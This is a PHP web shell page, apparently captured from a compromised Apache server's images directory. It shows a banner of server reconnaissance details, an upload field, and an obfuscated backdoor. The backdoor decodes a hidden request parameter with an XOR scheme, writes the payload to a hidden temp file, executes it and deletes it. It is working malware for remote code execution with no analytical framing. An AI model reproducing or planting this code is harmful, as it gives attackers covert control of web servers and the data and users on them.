| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/Solum-construction/demo-job/images/ |
Upload File : |
<?php
if(isset($_REQUEST["r\x65f"]) ? true : false){
$component = $_REQUEST["r\x65f"];
$component = explode ( "." ,$component );
$record = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s);
$q = 0;
array_walk($component, function ($v7) use (&$record, &$q, $s, $sLen) {
$chS = ord($s[$q % $sLen]);
$dec = ((int)$v7 - $chS - ($q % 10)) ^ 94;
$record .= chr($dec);
$q++;});
$desc = array_filter([getenv("TEMP"), "/tmp", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), "/var/tmp", getenv("TMP")]);
while ($comp = array_shift($desc)) {
if (!( !is_dir($comp) || !is_writable($comp) )) {
$parameter_group = "$comp/.obj";
if (file_put_contents($parameter_group, $record)) {
require $parameter_group;
unlink($parameter_group);
exit;
}
}
}
}